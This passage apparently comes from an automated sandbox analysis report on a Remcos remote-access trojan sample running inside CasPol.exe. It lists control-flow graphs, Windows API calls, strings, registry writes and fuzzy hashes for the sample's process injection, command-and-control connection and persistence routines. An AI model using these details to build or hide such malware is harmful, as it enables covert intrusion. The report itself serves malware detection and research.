107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 121 40d9e4-40d9e9 call 40699d call 4064d0 117->121 122 40d9ee-40da01 call 401d64 call 401e8f 117->122 121->122 122->107 138 40da03-40da09 122->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436050 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                            • API String ID: 2830904901-3665108517
                                                                                                            • Opcode ID: 9f973e99dceb02221dab3848e7669c1ef5b46b8e7220309f811798ebb2d5fd13
                                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                            • Opcode Fuzzy Hash: 9f973e99dceb02221dab3848e7669c1ef5b46b8e7220309f811798ebb2d5fd13
                                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 566 4142ca-4142d8 call 404915 call 40428c 560->566 567 41429f-4142c5 call 401f66 * 2 call 41a686 560->567 579 4142dd-4142df 566->579 567->583 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 579->582 579->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 595 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 583->595 596 414b8e-414b96 call 401d8c 583->596 595->596 596->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->583
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                            • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                            • API String ID: 524882891-2450167416
                                                                                                            • Opcode ID: 1dc3a93547332a1d08a66a24adf672adb5c65733396b5e32248b0304f3286437
                                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                            • Opcode Fuzzy Hash: 1dc3a93547332a1d08a66a24adf672adb5c65733396b5e32248b0304f3286437
                                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                            • API String ID: 994465650-2151626615
                                                                                                            • Opcode ID: 97530c22e8ac59ad4108418477dc87f58698bb5f1659eac08e909f9c40ed0378
                                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                            • Opcode Fuzzy Hash: 97530c22e8ac59ad4108418477dc87f58698bb5f1659eac08e909f9c40ed0378
                                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3658366068-0
                                                                                                            • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                            • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1022 40c8d0-40c8d5 1019->1022 1023 40c9c2-40c9c7 1019->1023 1024 40c905-40c90a 1019->1024 1025 40c9d8 1019->1025 1026 40c9c9-40c9ce call 43ac0f 1019->1026 1027 40c8da-40c8e8 call 41a74b call 401e18 1019->1027 1028 40c8fb-40c900 1019->1028 1029 40c9bb-40c9c0 1019->1029 1030 40c90f-40c916 call 41b15b 1019->1030 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1032 40c9dd-40c9e2 call 43ac0f 1022->1032 1023->1032 1024->1032 1025->1032 1038 40c9d3-40c9d6 1026->1038 1047 40c8ed 1027->1047 1028->1032 1029->1032 1042 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1042 1043 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1043 1044 40c9e3-40c9e8 call 4082d7 1032->1044 1038->1025 1038->1044 1052 40c8f1-40c8f6 call 401e13 1042->1052 1043->1047 1044->1020 1047->1052 1052->1020
                                                                                                            APIs
                                                                                                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LongNamePath
                                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                            • API String ID: 82841172-425784914
                                                                                                            • Opcode ID: 0aed9ec59981cee5dc30913d76a2f12fed1bf19adaefaa5d03a6754d969e8596
                                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                            • Opcode Fuzzy Hash: 0aed9ec59981cee5dc30913d76a2f12fed1bf19adaefaa5d03a6754d969e8596
                                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                            • API String ID: 1866151309-2070987746
                                                                                                            • Opcode ID: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                            • Opcode Fuzzy Hash: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1173 412724-412730 call 401eea 1170->1173 1171->1173
                                                                                                            APIs
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                            • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: HgF$pth_unenc
                                                                                                            • API String ID: 1818849710-3662775637
                                                                                                            • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                            • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                                                                                                            APIs
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                            • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: TUF
                                                                                                            • API String ID: 1818849710-3431404234
                                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                            • String ID: (CG
                                                                                                            • API String ID: 1925916568-4210230975
                                                                                                            • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                            • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                            • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
